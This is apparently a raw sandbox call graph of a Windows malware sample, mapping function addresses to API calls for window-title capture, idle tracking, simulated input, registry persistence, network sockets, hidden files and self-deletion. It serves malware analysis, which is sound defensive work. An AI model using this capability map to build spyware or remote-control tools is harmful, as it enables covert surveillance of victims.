47956->47964 47957 404e13 47958 401fd8 11 API calls 47957->47958 47959 404e1c 47958->47959 47959->47937 47960 4041a2 28 API calls 47960->47964 47961 4020f6 28 API calls 47961->47964 47962 401fc0 28 API calls 47963 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 47962->47963 47963->47964 48017 415aea 47963->48017 47964->47957 47964->47960 47964->47961 47964->47962 47965 401fe2 28 API calls 47964->47965 47966 401fd8 11 API calls 47964->47966 47969 419627 47964->47969 47965->47964 47966->47964 47968->47948 47970 41963e 47969->47970 48001 4041a2 47970->48001 47973 4196f4 47974 419754 47973->47974 47982 4196f9 47973->47982 47975 4197b8 47974->47975 47984 419759 47974->47984 47976 419809 47975->47976 47986 4197bd 47975->47986 47977 41980e mouse_event 47976->47977 47993 419656 47976->47993 47980 4197b2 47977->47980 47979 41969a 48004 419993 8 API calls 47979->48004 47983 401fd8 11 API calls 47980->47983 47981 41893c 102 API calls 47981->47980 48005 4194aa 6 API calls 47982->48005 47985 41987b 47983->47985 48007 4194aa 6 API calls 47984->48007 47987 401fd8 11 API calls 47985->47987 48009 4194aa 6 API calls 47986->48009 47991 419883 47987->47991 47991->47964 47992 4196ee 47992->47980 47993->47980 47993->47981 47994 4197f9 48010 419952 SendInput ___scrt_get_show_window_mode 47994->48010 47996 419742 48006 41988c SendInput ___scrt_get_show_window_mode 47996->48006 47998 4197a2 48008 4198ef SendInput ___scrt_get_show_window_mode 47998->48008 48011 40423a 48001->48011 48004->47992 48005->47996 48006->47992 48007->47998 48008->47980 48009->47994 48010->47992 48012 404243 48011->48012 48013 4023ce 11 API calls 48012->48013 48014 40424e 48013->48014 48015 402569 28 API calls 48014->48015 48016 4041b5 48015->48016 48016->47973 48016->47979 48016->47993 48018 4020f6 28 API calls 48017->48018 48019 415b0c SetEvent 48018->48019 48020 415b21 48019->48020 48021 4041a2 28 API calls 48020->48021 48022 415b3b 48021->48022 48023 4020f6 28 API calls 48022->48023 48024 415b4b 48023->48024 48025 4020f6 28 API calls 48024->48025 48026 415b5d 48025->48026 48096 41be1b 48026->48096 48029 415cd6 48031 401e8d 11 API calls 48029->48031 48030 415b86 GetTickCount 48032 41bb8e 28 API calls 48030->48032 48033 417092 48031->48033 48035 415b97 48032->48035 48036 401fd8 11 API calls 48033->48036 48034 415cf9 48144 4050e4 84 API calls 48034->48144 48118 41bae6 GetLastInputInfo GetTickCount 48035->48118 48039 41709e 48036->48039 48042 401fd8 11 API calls 48039->48042 48040 415cc9 48040->48029 48041 415ba3 48043 41bb8e 28 API calls 48041->48043 48044 4170aa 48042->48044 48045 415bae 48043->48045 48119 41ba96 48045->48119 48050 401e65 22 API calls 48051 415bd8 48050->48051 48052 402f31 28 API calls 48051->48052 48053 415be6 48052->48053 48054 402ea1 28 API calls 48053->48054 48055 415bf5 48054->48055 48056 402f10 28 API calls 48055->48056 48057 415c04 48056->48057 48058 402ea1 28 API calls 48057->48058 48059 415c13 48058->48059 48060 402f10 28 API calls 48059->48060 48061 415c1f 48060->48061 48062 402ea1 28 API calls 48061->48062 48063 415c29 48062->48063 48064 404aa1 61 API calls 48063->48064 48065 415c38 48064->48065 48066 401fd8 11 API calls 48065->48066 48067 415c41 48066->48067 48068 401fd8 11 API calls 48067->48068 48069 415c4d 48068->48069 48070 401fd8 11 API calls 48069->48070 48071 415c59 48070->48071 48072 401fd8 11 API calls 48071->48072 48073 415c65 48072->48073 48074 401fd8 11 API calls 48073->48074 48075 415c71 48074->48075 48076 401fd8 11 API calls 48075->48076 48077 415c7d 48076->48077 48078 401f09 11 API calls 48077->48078 48079 415c86 48078->48079 48080 401fd8 11 API calls 48079->48080 48081 415c8f 48080->48081 48082 401fd8 11 API calls 48081->48082 48083 415c98 48082->48083 48084 401e65 22 API calls 48083->48084 48085 415ca3 48084->48085 48086 43baac _strftime 40 API calls 48085->48086 48087 415cb0 48086->48087 48088 415cb5 48087->48088 48089 415cdb 48087->48089 48092 415cc3 48088->48092 48093 415cce 48088->48093 48090 401e65 22 API calls 48089->48090 48091 415ce5 48090->48091 48091->48029 48091->48034 48128 404ff4 82 API calls 48092->48128 48129 404f51 48093->48129 48097 4020df 11 API calls 48096->48097 48114 41be2e 48097->48114 48098 401fd8 11 API calls 48099 41bed0 48098->48099 48100 401fd8 11 API calls 48099->48100 48102 41bed8 48100->48102 48101 41bea0 48103 4041a2 28 API calls 48101->48103 48105 401fd8 11 API calls 48102->48105 48106 41beac 48103->48106 48104 4041a2 28 API calls 48104->48114 48107 415b66 48105->48107 48108 401fe2 28 API calls 48106->48108 48107->48029 48107->48030 48107->48091 48110 41beb5 48108->48110 48109 401fe2 28 API calls 48109->48114 48111 401fd8 11 API calls 48110->48111 48113 41bebd 48111->48113 48112 401fd8 11 API calls 48112->48114 48146 41ce34 28 API calls 48113->48146 48114->48101 48114->48104 48114->48109 48114->48112 48117 41be9e 48114->48117 48145 41ce34 28 API calls 48114->48145 48117->48098 48118->48041 48120 436e90 ___scrt_get_show_window_mode 48119->48120 48121 41bab5 GetForegroundWindow GetWindowTextW 48120->48121 48122 40417e 28 API calls 48121->48122 48123 415bbc 48122->48123 48124 41bd1e 48123->48124 48125 41bd2b 48124->48125 48126 4020b7 28 API calls 48125->48126 48127 415bca 48126->48127 48127->48050 48128->48040 48130 404fea 48129->48130 48131 404f65 48129->48131 48130->48029 48132 404f6e 48131->48132 48133 404fc0 CreateEventA CreateThread 48131->48133 48134 404f7d GetLocalTime 48131->48134 48132->48133 48133->48130 48148 405150 48133->48148 48135 41bb8e 28 API calls 48134->48135 48136 404f91 48135->48136 48147 4052fd 28 API calls 48136->48147 48144->48040 48145->48114 48146->48117 48151 40515c 102 API calls 48148->48151 48150 405159 48151->48150 48152->47742 48153->47747 48154->47749 48156 441e8d 48155->48156 48159 441c7d 48156->48159 48158 41bbb2 48158->47754 48160 441c94 48159->48160 48162 441ccb __cftof 48160->48162 48163 4405dd 20 API calls _abort 48160->48163 48162->48158 48163->48162 48164->47341 48165->47338 48166 434887 48167 434893 ___scrt_is_nonwritable_in_current_image 48166->48167 48193 434596 48167->48193 48169 43489a 48171 4348c3 48169->48171 48491 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 48169->48491 48180 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 48171->48180 48492 444251 5 API calls TranslatorGuardHandler 48171->48492 48173 4348dc 48175 4348e2 ___scrt_is_nonwritable_in_current_image 48173->48175 48493 4441f5 5 API calls TranslatorGuardHandler 48173->48493 48176 434962 48204 434b14 48176->48204 48180->48176 48494 4433e7 36 API calls 5 library calls 48180->48494 48186 434984 48187 43498e 48186->48187 48496 44341f 28 API calls _abort 48186->48496 48189 434997 48187->48189 48497 4433c2 28 API calls _abort 48187->48497 48498 43470d 13 API calls 2 library calls 48189->48498 48192 43499f 48192->48175 48194 43459f 48193->48194 48499 434c52 IsProcessorFeaturePresent 48194->48499 48196 4345ab 48500 438f31 10 API calls 4 library calls 48196->48500 48198 4345b0 48203 4345b4 48198->48203 48501 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48198->48501 48200 4345bd 48201 4345cb 48200->48201 48502 438f5a 8 API calls 3 library calls 48200->48502 48201->48169 48203->48169 48205 436e90 ___scrt_get_show_window_mode 48204->48205 48206 434b27 GetStartupInfoW 48205->48206 48207 434968 48206->48207 48208 4441a2 48207->48208 48503 44f059 48208->48503 48210 4441ab 48211 434971 48210->48211 48507 446815 36 API calls 48210->48507 48213 40e9c5 48211->48213 48509 41cb50 LoadLibraryA GetProcAddress 48213->48509 48215 40e9e1 GetModuleFileNameW 48514 40f3c3 48215->48514 48217 40e9fd 48218 4020f6 28 API calls 48217->48218 48219 40ea0c 48218->48219 48220 4020f6 28 API calls 48219->48220 48221 40ea1b 48220->48221 48222 41be1b 28 API calls 48221->48222 48223 40ea24 48222->48223 48529 40fb17 48223->48529 48225 40ea2d 48226 401e8d 11 API calls 48225->48226 48227 40ea36 48226->48227 48228 40ea93 48227->48228 48229 40ea49 48227->48229 48231 401e65 22 API calls 48228->48231 48714 40fbb3 118 API calls 48229->48714 48232 40eaa3 48231->48232 48236 401e65 22 API calls 48232->48236 48233 40ea5b 48234 401e65 22 API calls 48233->48234 48235 40ea67 48234->48235 48715 410f37 36 API calls __EH_prolog 48235->48715 48237 40eac2 48236->48237 48238 40531e 28 API calls 48237->48238 48240 40ead1 48238->48240 48242 406383 28 API calls 48240->48242 48241 40ea79 48716 40fb64 78 API calls 48241->48716 48244 40eadd 48242->48244 48246 401fe2 28 API calls 48244->48246 48245 40ea82 48717 40f3b0 71 API calls 48245->48717 48248 40eae9 48246->48248 48249 401fd8 11 API calls 48248->48249 48250 40eaf2 48249->48250 48252 401fd8 11 API calls 48250->48252 48251 401fd8 11 API calls 48253 40eefb 48251->48253 48254 40eafb 48252->48254 48495 4432f6 GetModuleHandleW 48253->48495 48255 401e65 22 API calls 48254->48255 48256 40eb04 48255->48256 48257 401fc0 28 API calls 48256->48257 48258 40eb0f 48257->48258 48259 401e65 22 API calls 48258->48259 48260 40eb28 48259->48260 48261 401e65 22 API calls 48260->48261 48262 40eb43 48261->48262 48263 40ebae 48262->48263 48718 406c1e 48262->48718 48264 401e65 22 API calls 48263->48264 48271 40ebbb 48264->48271 48266 40eb70 48267 401fe2 28 API calls 48266->48267 48268 40eb7c 48267->48268 48269 401fd8 11 API calls 48268->48269 48272 40eb85 48269->48272 48270 40ec02 48533 40d069 48270->48533 48271->48270 48275 413549 3 API calls 48271->48275 48723 413549 RegOpenKeyExA 48272->48723 48274 40ec08 48276 40ea8b 48274->48276 48536 41b2c3 48274->48536 48282 40ebe6 48275->48282 48276->48251 48280 40ec23 48283 40ec76 48280->48283 48553 407716 48280->48553 48281 40f34f 48806 4139a9 30 API calls 48281->48806 48282->48270 48726 4139a9 30 API calls 48282->48726 48285 401e65 22 API calls 48283->48285 48288 40ec7f 48285->48288 48297 40ec90 48288->48297 48298 40ec8b 48288->48298 48290 40f365 48807 412475 65 API calls ___scrt_get_show_window_mode 48290->48807 48291 40ec42 48727 407738 30 API calls 48291->48727 48292 40ec4c 48295 401e65 22 API calls 48292->48295 48306 40ec55 48295->48306 48296 40f36f 48300 41bc5e 28 API calls 48296->48300 48304 401e65 22 API calls 48297->48304 48730 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 48298->48730 48299 40ec47 48728 407260 98 API calls 48299->48728 48301 40f37f 48300->48301 48616 413a23 RegOpenKeyExW 48301->48616 48305 40ec99 48304->48305 48557 41bc5e 48305->48557 48306->48283 48311 40ec71 48306->48311 48308 40eca4 48310 401f13 28 API calls 48308->48310 48313 40ecaf 48310->48313 48729 407260 98 API calls 48311->48729 48316 401f09 11 API calls 48313->48316 48315 401f09 11 API calls 48317 40f39c 48315->48317 48318 40ecb8 48316->48318 48319 401f09 11 API calls 48317->48319 48320 401e65 22 API calls 48318->48320 48321 40f3a5 48319->48321 48322 40ecc1 48320->48322 48619 40dd42 48321->48619 48326 401e65 22 API calls 48322->48326 48328 40ecdb 48326->48328 48327 40f3af 48329 401e65 22 API calls 48328->48329 48330 40ecf5 48329->48330 48331 401e65 22 API calls 48330->48331 48332 40ed0e 48331->48332 48333 401e65 22 API calls 48332->48333 48364 40ed7b 48332->48364 48338 40ed23 _wcslen 48333->48338 48334 40ed8a 48335 40ed93 48334->48335 48349 40ee0f ___scrt_get_show_window_mode 48334->48349 48336 401e65 22 API calls 48335->48336 48337 40ed9c 48336->48337 48339 401e65 22 API calls 48337->48339 48342 401e65 22 API calls 48338->48342 48338->48364 48341 40edae 48339->48341 48340 40ef06 ___scrt_get_show_window_mode 48791 4136f8 RegOpenKeyExA 48340->48791 48345 401e65 22 API calls 48341->48345 48343 40ed3e 48342->48343 48346 401e65 22 API calls 48343->48346 48347 40edc0 48345->48347 48348 40ed53 48346->48348 48351 401e65 22 API calls 48347->48351 48731 40da34 48348->48731 48561 413947 48349->48561 48350 40ef51 48352 401e65 22 API calls 48350->48352 48355 40ede9 48351->48355 48356 40ef76 48352->48356 48360 401e65 22 API calls 48355->48360 48358 402093 28 API calls 48356->48358 48357 401f13 28 API calls 48359 40ed72 48357->48359 48361 40ef88 48358->48361 48362 401f09 11 API calls 48359->48362 48363 40edfa 48360->48363 48571 41376f RegCreateKeyA 48361->48571 48362->48364 48789 40cdf9 46 API calls _wcslen 48363->48789 48364->48334 48364->48340 48368 40ee0a 48368->48349 48370 40eea3 ctype 48373 401e65 22 API calls 48370->48373 48371 401e65 22 API calls 48372 40efaa 48371->48372 48375 43baac _strftime 40 API calls 48372->48375 48374 40eeba 48373->48374 48374->48350 48377 40eece 48374->48377 48376 40efb7 48375->48376 48378 40efc1 48376->48378 48379 40efe4 48376->48379 48380 401e65 22 API calls 48377->48380 48794 41cd9b 88 API calls ___scrt_get_show_window_mode 48378->48794 48384 402093 28 API calls 48379->48384 48382 40eed7 48380->48382 48385 41bc5e 28 API calls 48382->48385 48383 40efc8 CreateThread 48383->48379 49209 41d45d 10 API calls 48383->49209 48386 40eff9 48384->48386 48387 40eee3 48385->48387 48388 402093 28 API calls 48386->48388 48790 40f474 107 API calls 48387->48790 48390 40f008 48388->48390 48392 41b4ef 80 API calls 48390->48392 48391 40eee8 48391->48350 48393 40eeef 48391->48393 48394 40f00d 48392->48394 48393->48276 48395 401e65 22 API calls 48394->48395 48396 40f019 48395->48396 48397 401e65 22 API calls 48396->48397 48398 40f02b 48397->48398 48399 401e65 22 API calls 48398->48399 48400 40f04b 48399->48400 48401 43baac _strftime 40 API calls 48400->48401 48402 40f058 48401->48402 48403 401e65 22 API calls 48402->48403 48404 40f063 48403->48404 48405 401e65 22 API calls 48404->48405 48406 40f074 48405->48406 48407 401e65 22 API calls 48406->48407 48408 40f089 48407->48408 48409 401e65 22 API calls 48408->48409 48410 40f09a 48409->48410 48411 40f0a1 StrToIntA 48410->48411 48577 409de4 48411->48577 48414 401e65 22 API calls 48415 40f0bc 48414->48415 48416 40f101 48415->48416 48417 40f0c8 48415->48417 48420 401e65 22 API calls 48416->48420 48795 4344ea 48417->48795 48422 40f111 48420->48422 48421 401e65 22 API calls 48423 40f0e4 48421->48423 48425 40f159 48422->48425 48426 40f11d 48422->48426 48424 40f0eb CreateThread 48423->48424 48424->48416 49207 419fb4 110 API calls 2 library calls 48424->49207 48427 401e65 22 API calls 48425->48427 48428 4344ea new 22 API calls 48426->48428 48429 40f162 48427->48429 48430 40f126 48428->48430 48433 40f1cc 48429->48433 48434 40f16e 48429->48434 48431 401e65 22 API calls 48430->48431 48432 40f138 48431->48432 48435 40f13f CreateThread 48432->48435 48436 401e65 22 API calls 48433->48436 48437 401e65 22 API calls 48434->48437 48435->48425 49206 419fb4 110 API calls 2 library calls 48435->49206 48438 40f1d5 48436->48438 48439 40f17e 48437->48439 48440 40f1e1 48438->48440 48441 40f21a 48438->48441 48442 401e65 22 API calls 48439->48442 48444 401e65 22 API calls 48440->48444 48602 41b60d GetComputerNameExW GetUserNameW 48441->48602 48445 40f193 48442->48445 48447 40f1ea 48444->48447 48802 40d9e8 32 API calls 48445->48802 48451 401e65 22 API calls 48447->48451 48448 401f13 28 API calls 48450 40f22e 48448->48450 48453 401f09 11 API calls 48450->48453 48454 40f1ff 48451->48454 48452 40f1a6 48455 401f13 28 API calls 48452->48455 48456 40f237 48453->48456 48465 43baac _strftime 40 API calls 48454->48465 48459 40f1b2 48455->48459 48457 40f240 SetProcessDEPPolicy 48456->48457 48458 40f243 CreateThread 48456->48458 48457->48458 48460 40f264 48458->48460 48461 40f258 CreateThread 48458->48461 49177 40f7a7 48458->49177 48462 401f09 11 API calls 48459->48462 48463 40f279 48460->48463 48464 40f26d CreateThread 48460->48464 48461->48460 49208 4120f7 139 API calls 48461->49208 48466 40f1bb CreateThread 48462->48466 48468 40f2cc 48463->48468 48470 402093 28 API calls 48463->48470 48464->48463 49204 4126db 38 API calls ___scrt_get_show_window_mode 48464->49204 48467 40f20c 48465->48467 48466->48433 49205 401be9 50 API calls _strftime 48466->49205 48803 40c162 7 API calls 48467->48803 48613 4134ff RegOpenKeyExA 48468->48613 48471 40f29c 48470->48471 48804 4052fd 28 API calls 48471->48804 48476 40f2ed 48478 41bc5e 28 API calls 48476->48478 48481 40f2fd 48478->48481 48805 41361b 31 API calls 48481->48805 48485 40f313 48486 401f09 11 API calls 48485->48486 48489 40f31e 48486->48489 48487 40f346 DeleteFileW 48488 40f34d 48487->48488 48487->48489 48488->48296 48489->48296 48489->48487 48490 40f334 Sleep 48489->48490 48490->48489 48491->48169 48492->48173 48493->48180 48494->48176 48495->48186 48496->48187 48497->48189 48498->48192 48499->48196 48500->48198 48501->48200 48502->48203 48504 44f06b 48503->48504 48505 44f062 48503->48505 48504->48210 48508 44ef58 49 API calls 5 library calls 48505->48508 48507->48210 48508->48504 48510 41cb8f LoadLibraryA GetProcAddress 48509->48510 48511 41cb7f GetModuleHandleA GetProcAddress 48509->48511 48512 41cbb8 44 API calls 48510->48512 48513 41cba8 LoadLibraryA GetProcAddress 48510->48513 48511->48510 48512->48215 48513->48512 48808 41b4a8 FindResourceA 48514->48808 48517 43bd51 new 21 API calls 48518 40f3ed ctype 48517->48518 48519 4020b7 28 API calls 48518->48519 48520 40f408 48519->48520 48521 401fe2 28 API calls 48520->48521 48522 40f413 48521->48522 48523 401fd8 11 API calls 48522->48523 48524 40f41c 48523->48524 48525 43bd51 new 21 API calls 48524->48525 48526 40f42d ctype 48525->48526 48811 406dd8 48526->48811 48528 40f460 48528->48217 48530 40fb23 48529->48530 48532 40fb2a 48529->48532 48814 402163 11 API calls 48530->48814 48532->48225 48815 401fab 48533->48815 48535 40d073 CreateMutexA GetLastError 48535->48274 48816 41bfb7 48536->48816 48541 401fe2 28 API calls 48542 41b2ff 48541->48542 48543 401fd8 11 API calls 48542->48543 48544 41b307 48543->48544 48545 4135a6 31 API calls 48544->48545 48546 41b35d 48544->48546 48547 41b330 48545->48547 48546->48280 48548 41b33b StrToIntA 48547->48548 48549 41b352 48548->48549 48550 41b349 48548->48550 48551 401fd8 11 API calls 48549->48551 48825 41cf69 22 API calls 48550->48825 48551->48546 48554 40772a 48553->48554 48555 413549 3 API calls 48554->48555 48556 407731 48555->48556 48556->48291 48556->48292 48558 41bc72 48557->48558 48826 40b904 48558->48826 48560 41bc7a 48560->48308 48562 413965 48561->48562 48563 406dd8 28 API calls 48562->48563 48564 41397a 48563->48564 48565 4020f6 28 API calls 48564->48565 48566 41398a 48565->48566 48567 41376f 14 API calls 48566->48567 48568 413994 48567->48568 48569 401fd8 11 API calls 48568->48569 48570 4139a1 48569->48570 48570->48370 48572 4137bf 48571->48572 48574 413788 48571->48574 48573 401fd8 11 API calls 48572->48573 48575 40ef9e 48573->48575 48576 41379a RegSetValueExA RegCloseKey 48574->48576 48575->48371 48576->48572 48578 409e02 _wcslen 48577->48578 48579 409e24 48578->48579 48580 409e0d 48578->48580 48582 40da34 32 API calls 48579->48582 48581 40da34 32 API calls 48580->48581 48583 409e15 48581->48583 48584 409e2c 48582->48584 48585 401f13 28 API calls 48583->48585 48586 401f13 28 API calls 48584->48586 48587 409e1f 48585->48587 48588 409e3a 48586->48588 48590 401f09 11 API calls 48587->48590 48589 401f09 11 API calls 48588->48589 48591 409e42 48589->48591 48592 409e79 48590->48592 48855 40915b 28 API calls 48591->48855 48840 40a109 48592->48840 48595 409e54 48596 403014 28 API calls 48595->48596 48598 409e5f 48596->48598 48599 401f13 28 API calls 48598->48599 48600 409e69 48599->48600 48601 401f09 11 API calls 48600->48601 48601->48587 48603 40417e 28 API calls 48602->48603 48604 41b65c 48603->48604 49002 4042fc 48604->49002 48607 403014 28 API calls 48608 41b672 48607->48608 48609 401f09 11 API calls 48608->48609 48610 41b67b 48609->48610 48611 401f09 11 API calls 48610->48611 48612 40f223 48611->48612 48612->48448 48614 413520 RegQueryValueExA RegCloseKey 48613->48614 48615 40f2e4 48613->48615 48614->48615 48615->48321 48615->48476 48617 40f392 48616->48617 48618 413a3f RegDeleteValueW 48616->48618 48617->48315 48618->48617 48620 40dd5b 48619->48620 48621 4134ff 3 API calls 48620->48621 48622 40dd62 48621->48622 48626 40dd81 48622->48626 49077 401707 48622->49077 48624 40dd6f 49080 413877 RegCreateKeyA 48624->49080 48627 414f2a 48626->48627 48628 4020df 11 API calls 48627->48628 48629 414f3e 48628->48629 49094 41b8b3 48629->49094 48632 4020df 11 API calls 48633 414f54 48632->48633 48634 401e65 22 API calls 48633->48634 48635 414f62 48634->48635 48636 43baac _strftime 40 API calls 48635->48636 48637 414f6f 48636->48637 48638 414f81 48637->48638 48639 414f74 Sleep 48637->48639 48640 402093 28 API calls 48638->48640 48639->48638 48641 414f90 48640->48641 48642 401e65 22 API calls 48641->48642 48643 414f99 48642->48643 48644 4020f6 28 API calls 48643->48644 48645 414fa4 48644->48645 48646 41be1b 28 API calls 48645->48646 48647 414fac 48646->48647 49098 40489e WSAStartup 48647->49098 48649 414fb6 48650 401e65 22 API calls 48649->48650 48651 414fbf 48650->48651 48652 401e65 22 API calls 48651->48652 48708 41503e 48651->48708 48653 414fd8 48652->48653 48654 401e65 22 API calls 48653->48654 48655 414fe9 48654->48655 48657 401e65 22 API calls 48655->48657 48656 41be1b 28 API calls 48656->48708 48658 414ffa 48657->48658 48659 401e65 22 API calls 48658->48659 48661 41500b 48659->48661 48660 406c1e 28 API calls 48660->48708 48663 401e65 22 API calls 48661->48663 48662 401fe2 28 API calls 48662->48708 48664 41501c 48663->48664 48665 401e65 22 API calls 48664->48665 48666 41502e 48665->48666 49123 40473d 89 API calls 48666->49123 48668 402f10 28 API calls 48668->48708 48669 402093 28 API calls 48669->48708 48670 41b4ef 80 API calls 48670->48708 48672 41518c WSAGetLastError 49124 41cae1 30 API calls 48672->49124 48673 40482d 3 API calls 48673->48708 48676 404f51 105 API calls 48676->48708 48677 4048c8 97 API calls 48677->48708 48678 404e26 99 API calls 48678->48708 48679 40531e 28 API calls 48679->48708 48680 401e65 22 API calls 48683 415a33 48680->48683 48681 401e8d 11 API calls 48681->48708 48682 406383 28 API calls 48682->48708 48683->48680 48684 43baac _strftime 40 API calls 48683->48684 49126 40b051 85 API calls 48683->49126 48685 415acf Sleep 48684->48685 48685->48708 48688 40905c 28 API calls 48688->48708 48689 441e81 20 API calls 48689->48708 48690 401e65 22 API calls 48690->48708 48691 4020f6 28 API calls 48691->48708 48692 4136f8 3 API calls 48692->48708 48693 4135a6 31 API calls 48693->48708 48694 40417e 28 API calls 48694->48708 48697 401e65 22 API calls 48698 415439 GetTickCount 48697->48698 48699 41bb8e 28 API calls 48698->48699 48699->48708 48701 41bb8e 28 API calls 48701->48708 48702 41ba96 30 API calls 48702->48708 48703 41bd1e 28 API calls 48703->48708 48705 402f31 28 API calls 48705->48708 48706 402ea1 28 API calls 48706->48708 48707 404aa1 61 API calls 48707->48708 48708->48656 48708->48660 48708->48662 48708->48668 48708->48669 48708->48670 48708->48672 48708->48673 48708->48676 48708->48677 48708->48678 48708->48679 48708->48681 48708->48682 48708->48683 48708->48688 48708->48689 48708->48690 48708->48691 48708->48692 48708->48693 48708->48694 48708->48697 48708->48701 48708->48702 48708->48703 48708->48705 48708->48706 48708->48707 48709 401fd8 11 API calls 48708->48709 48710 401f09 11 API calls 48708->48710 48711 404c10 188 API calls 48708->48711 48713 415a71 CreateThread 48708->48713 49099 414ee9 48708->49099 49104 41b7e0 48708->49104 49107 4145bd 48708->49107 49110 40dd89 48708->49110 49116 41bc42 48708->49116 49119 41bae6 GetLastInputInfo GetTickCount 48708->49119 49120 40f8d1 GetLocaleInfoA 48708->49120 49125 4052fd 28 API calls 48708->49125 48709->48708 48710->48708 48711->48708 48713->48708 49167 41ad17 106 API calls 48713->49167 48714->48233 48715->48241 48716->48245 48719 4020df 11 API calls 48718->48719 48720 406c2a 48719->48720 48721 4032a0 28 API calls 48720->48721 48722 406c47 48721->48722 48722->48266 48724 413573 RegQueryValueExA RegCloseKey 48723->48724 48725 40eba4 48723->48725 48724->48725 48725->48263 48725->48281 48726->48270 48727->48299 48728->48292 48729->48283 48730->48297 48732 401f86 11 API calls 48731->48732 48733 40da50 48732->48733 48734 40da70 48733->48734 48735 40daa5 48733->48735 48736 40da66 48733->48736 49168 41b5b4 29 API calls 48734->49168 48739 41bfb7 2 API calls 48735->48739 48738 40db99 GetLongPathNameW 48736->48738 48741 40417e 28 API calls 48738->48741 48742 40daaa 48739->48742 48740 40da79 48743 401f13 28 API calls 48740->48743 48744 40dbae 48741->48744 48745 40db00 48742->48745 48746 40daae 48742->48746 48784 40da83 48743->48784 48747 40417e 28 API calls 48744->48747 48748 40417e 28 API calls 48745->48748 48749 40417e 28 API calls 48746->48749 48751 40dbbd 48747->48751 48752 40db0e 48748->48752 48750 40dabc 48749->48750 48758 40417e 28 API calls 48750->48758 49171 40ddd1 28 API calls 48751->49171 48757 40417e 28 API calls 48752->48757 48753 401f09 11 API calls 48753->48736 48755 40dbd0 49172 402fa5 28 API calls 48755->49172 48760 40db24 48757->48760 48761 40dad2 48758->48761 48759 40dbdb 49173 402fa5 28 API calls 48759->49173 49170 402fa5 28 API calls 48760->49170 49169 402fa5 28 API calls 48761->49169 48765 40dbe5 48768 401f09 11 API calls 48765->48768 48766 40db2f 48769 401f13 28 API calls 48766->48769 48767 40dadd 48770 401f13 28 API calls 48767->48770 48771 40dbef 48768->48771 48772 40db3a 48769->48772 48773 40dae8 48770->48773 48774 401f09 11 API calls 48771->48774 48775 401f09 11 API calls 48772->48775 48776 401f09 11 API calls 48773->48776 48777 40dbf8 48774->48777 48778 40db43 48775->48778 48779 40daf1 48776->48779 48780 401f09 11 API calls 48777->48780 48781 401f09 11 API calls 48778->48781 48782 401f09 11 API calls 48779->48782 48783 40dc01 48780->48783 48781->48784 48782->48784 48785 401f09 11 API calls 48783->48785 48784->48753 48786 40dc0a 48785->48786 48787 401f09 11 API calls 48786->48787 48788 40dc13 48787->48788 48788->48357 48789->48368 48790->48391 48792 413742 48791->48792 48793 41371e RegQueryValueExA RegCloseKey 48791->48793 48792->48350 48793->48792 48794->48383 48798 4344ef 48795->48798 48796 43bd51 new 21 API calls 48796->48798 48797 40f0d1 48797->48421 48798->48796 48798->48797 49174 442f80 7 API calls 2 library calls 48798->49174 49175 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48798->49175 49176 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48798->49176 48802->48452 48803->48441 48805->48485 48806->48290 48809 41b4c5 LoadResource LockResource SizeofResource 48808->48809 48810 40f3de 48808->48810 48809->48810 48810->48517 48812 4020b7 28 API calls 48811->48812 48813 406dec 48812->48813 48813->48528 48814->48532 48817 41bfc4 GetCurrentProcess IsWow64Process 48816->48817 48818 41b2d1 48816->48818 48817->48818 48819 41bfdb 48817->48819 48820 4135a6 RegOpenKeyExA 48818->48820 48819->48818 48821 4135d4 RegQueryValueExA RegCloseKey 48820->48821 48822 4135fe 48820->48822 48821->48822 48823 402093 28 API calls 48822->48823 48824 413613 48823->48824 48824->48541 48825->48549 48827 40b90c 48826->48827 48828 402252 11 API calls 48827->48828 48829 40b917 48828->48829 48832 40b92c 48829->48832 48831 40b926 48831->48560 48833 40b966 48832->48833 48834 40b938 48832->48834 48839 4028a4 22 API calls 48833->48839 48835 4027e6 28 API calls 48834->48835 48838 40b942 48835->48838 48838->48831 48841 40a127 48840->48841 48842 413549 3 API calls 48841->48842 48843 40a12e 48842->48843 48844 40a142 48843->48844 48845 40a15c 48843->48845 48846 409e9b 48844->48846 48847 40a147 48844->48847 48856 40905c 48845->48856 48846->48414 48849 40905c 28 API calls 48847->48849 48851 40a155 48849->48851 48884 40a22d 29 API calls 48851->48884 48854 40a15a 48854->48846 48855->48595 48857 409072 48856->48857 48858 402252 11 API calls 48857->48858 48859 40908c 48858->48859 48860 404267 28 API calls 48859->48860 48861 40909a 48860->48861 48862 40a179 48861->48862 48885 40b8ec 48862->48885 48865 40a1a2 48867 402093 28 API calls 48865->48867 48866 40a1ca 48868 402093 28 API calls 48866->48868 48869 40a1ac 48867->48869 48870 40a1d5 48868->48870 48871 41bc5e 28 API calls 48869->48871 48872 402093 28 API calls 48870->48872 48873 40a1ba 48871->48873 48874 40a1e4 48872->48874 48889 40b164 31 API calls new 48873->48889 48876 41b4ef 80 API calls 48874->48876 48878 40a1e9 CreateThread 48876->48878 48877 40a1c1 48879 401fd8 11 API calls 48877->48879 48880 40a210 CreateThread 48878->48880 48881 40a204 CreateThread 48878->48881 48891 40a27d 48878->48891 48879->48866 48882 401f09 11 API calls 48880->48882 48897 40a289 48880->48897 48881->48880 48894 40a267 48881->48894 48883 40a224 48882->48883 48883->48846 48884->48854 49001 40a273 164 API calls 48884->49001 48886 40b8f5 48885->48886 48887 40a197 48885->48887 48890 40b96c 28 API calls 48886->48890 48887->48865 48887->48866 48889->48877 48890->48887 48900 40a726 48891->48900 48947 40a2b8 48894->48947 48963 40acd6 48897->48963 48901 40a73b Sleep 48900->48901 48921 40a675 48901->48921 48903 40a286 48904 40a77b CreateDirectoryW 48909 40a74d 48904->48909 48905 40a78c GetFileAttributesW 48905->48909 48906 40a7a3 SetFileAttributesW 48906->48909 48907 4020df 11 API calls 48919 40a7ee 48907->48919 48909->48901 48909->48903 48909->48904 48909->48905 48909->48906 48911 401e65 22 API calls 48909->48911 48909->48919 48934 41c3f1 48909->48934 48910 40a81d PathFileExistsW 48910->48919 48911->48909 48912 4020b7 28 API calls 48912->48919 48914 40a926 SetFileAttributesW 48914->48909 48915 401fe2 28 API calls 